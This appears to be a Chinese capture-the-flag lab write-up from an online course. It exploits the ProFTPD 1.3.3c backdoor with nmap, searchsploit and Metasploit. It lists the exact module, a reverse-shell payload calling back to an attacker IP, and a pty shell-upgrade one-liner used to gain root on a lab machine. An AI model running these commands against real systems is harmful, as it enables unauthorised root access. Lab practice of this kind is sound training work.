51CTO的网课,本篇针对FTP服务后门,利用metasploit搜索可用payload渗透靶机,获取flag。
本篇使用工具nmap、metasploit。
使用命令
nmap
探测靶场开放的服务与服务的版本
探测靶场全部信息
1
| -- nmap -A -v -T4 靶场IP地址
|
1 2 3 4 5 6 7 8 9 10 11 12 13
| msfconsole >search 对应服务及版本 >use 对应exploit
>show payloads >set payload 对应payload
>show options
>set rhosts 靶机IP地址 >set lhost 攻击机IP地址
>run
|
shell优化
1
| python -c "import pty;pty.spawn('/bin/bash')"
|
渗透记录
- nmap扫描靶机IP地址开放端口、系统信息等:
1 2
| nmap -sV 192.168.1.113 nmap -A -v -T4 192.168.1.113
|
- 搜索该ftp服务版本,查找可利用漏洞,看到metasploit里有可用漏洞:
1
| searchsploit ProFTPD 1.3.3c
|
- 进metasploit,搜索可利用漏洞,选择版本对应的这个:
1 2 3
| msfconsole >search ProFTPD 1.3.3c >use exploit/unix/ftp/proftpd_133c_backdoor
|
- 查看可利用payloads,选择这个:
1 2
| >show payloads >set payload cmd/unix/reverse
|
- 设置靶机IP和攻击机IP:
1 2
| >set rhosts 192.168.1.113 >set lhost 192.168.1.114
|
- 执行渗透,成功拿到root权限:
- 优化shell,切换到根目录拿到flag,这里是有flag的,可能我这个靶机镜像被之前的使用者删掉了:
参考资料
- 2020发布 CTF基础入门/CTF教程零基础 渗透测试/web安全/CTF夺旗【整套教程】